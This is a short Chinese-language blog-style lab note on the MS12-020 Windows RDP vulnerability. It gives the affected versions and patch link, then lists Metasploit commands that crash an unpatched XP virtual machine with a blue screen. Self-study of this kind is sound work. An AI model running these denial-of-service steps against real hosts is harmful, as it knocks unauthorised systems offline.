正好這幾天不忙,就想着慢慢學習,再寫點簡單的東西,進行總結記錄。
這次嘗試的是MS12-020,可導致BSOD(死亡藍屏)
MS12-020全稱Microsoft Windows遠程桌面協議RDP遠程代碼執行漏洞,
遠程桌面協議(RDP, Remote Desktop Protocol)是一個多通道(multi-channel)的協議,讓用戶(客戶端或稱“本地電腦”)連上提供微軟終端機服務的電腦(服務器端或稱“遠程電腦”)。Windows在處理某些對象時存在錯誤,可通過特制的RDP報文訪問未初始化的或已經刪除的對象,導致任意代碼執行,然后控制系統。
CVE ID: CVE-2012-0002
影響范圍:開了RDP的Microsoft Windows XP Professional /Microsoft Windows XP Home/ Microsoft Windows Server 2003 Standard Edition /Microsoft Windows Server 2003 Enterprise Edition /Microsoft Windows Server 2003 Datacenter Edition /Microsoft Windows 7(綠盟說是影響全版本windows系統,當時win8和win10還未出)
補丁地址:https://technet.microsoft.com/library/security/ms12-020
首先確定kali為攻擊機,windows xp professional service park 2為靶機。當然,開啟了遠程桌面,也沒打補丁。
接下來,打開msfconsole,輸入命令search ms12-020
可選擇的模塊有2個,我們先選擇第一個進行。嘗試。
輸入命令:use auxiliary/dos/windows/rdp/ms12_020_maxchannelids 然后回車
進入這個模塊后,查看當下的配置。
show options
然后設置靶機IP。
set RHOST 192.168.19.130
最后,輸入run,回車運行。
當提示seems down時,查看靶機情況。
如圖所示,RPDWD.SYS引起的藍屏。